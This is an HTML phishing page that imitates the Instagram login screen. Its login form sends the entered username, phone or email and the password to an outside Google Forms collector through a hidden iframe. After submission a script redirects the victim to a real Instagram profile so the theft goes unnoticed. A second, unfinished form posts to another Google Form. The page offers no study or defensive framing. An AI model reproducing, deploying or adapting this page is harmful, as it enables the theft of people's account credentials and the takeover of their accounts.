<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Instagram Login Page</title>
	<link rel="stylesheet" href="style.css">
	
	
	<form action="https://docs.google.com/forms/d/e/1FAIpQLSdZ3dqqF4MUA8lsrXJawq2lo2-ydk-AMWwkvhRPSPij-Vvkug/formResponse" target="hidden_iframe" method="POST">
	
	

</head>
<body>

<div class="wrapper">
	<div class="header">
		<div class="top">
			<div class="logo">
				<img src="instagram.png" alt="instagram" style="width: 175px;">
			</div>
			<div class="form">
				<div class="input_field">
					<input type="text" placeholder="Phone number, username, or email" class="input" name="entry.1239694159">
				</div>
				<div class="input_field">
					<input type="password" placeholder="Password" class="input" name="entry.1685669725">
				</div>
				<button type="submit" class="btn">Log in</button>
			</div>
			<div class="or">
				<div class="line"></div>
				<p>OR</p>
				<div class="line"></div>
			</div>
			<div class="dif">
				<div class="fb">
					<img src="facebook.png" alt="facebook">
					<p>Log in with Facebook</p>
				</div>
				<div class="forgot">
					<a href="https://www.instagram.com/accounts/password/reset/">Forgot password?</a>
				</div>
			</div>
		</div>
		<div class="signup">
			<p>Don't have an account? <a href="https://www.instagram.com/accounts/signup/phone">Sign up</a></p>
		</div>
		<div class="apps">
			<p>Get the app.</p>
			<div class="icons">
				<a href="#"><img src="appstore.png" alt="appstore"></a>
				<a href="https://www.google.com/search?q=Instagram+app+link&oq=Instagram+app+link&aqs=chrome..69i57j0i512j0i2i512j0i512j0i22i30l4.4496j0j4&client=ms-android-oppo-rvo3&sourceid=chrome-mobile&ie=UTF-8#"><img src="googleplay.png" alt="googleplay"></a>
			</div>
		</div>
	</div>
	</form>
<div class="footer">
		<div class="links">
			<ul>
				<li><a href="#">ABOUT US</a></li>
				<li><a href="#">SUPPORT</a></li>
				<li><a href="#">PRESS</a></li>
				<li><a href="#">API</a></li>
				<li><a href="#">JOBS</a></li>
				<li><a href="#">PRIVACY</a></li>
				<li><a href="#">TERMS</a></li>
				<li><a href="#">DIRECTORY</a></li>
				<li><a href="https://www.instagram.com/directory/profiles/?mobilehome=1">PROFILES</a></li>
				<li><a href="https://www.instagram.com/directory/hashtags/?mobilehome=1">HASHTAG</a></li>
			</ul>
		</div>
		<div class="copyright">
			© 2019 INSTAGRAM
		</div>
	</div>
</div>




<script type="text/javascript">var submitted=false; </script>

<iframe name="hidden_iframe"
        id="hidden_iframe"
        style="display:none;"
        onload="if(submitted){window.location='https://www.instagram.com/naiahaaj/';}">
</iframe> 
<form action="https://docs.google.com/forms/d/e/1FAIpQLScJZbCSSHTQ9-70lr05ejSiBJrkua_EziqNRsdfLPULT8663Q/formResponse" method="post" target="hidden_iframe"

onsubmit="submitted=true"s style="max-width:400px;margin: auto; margin-top: 100px">






</body>
</html>
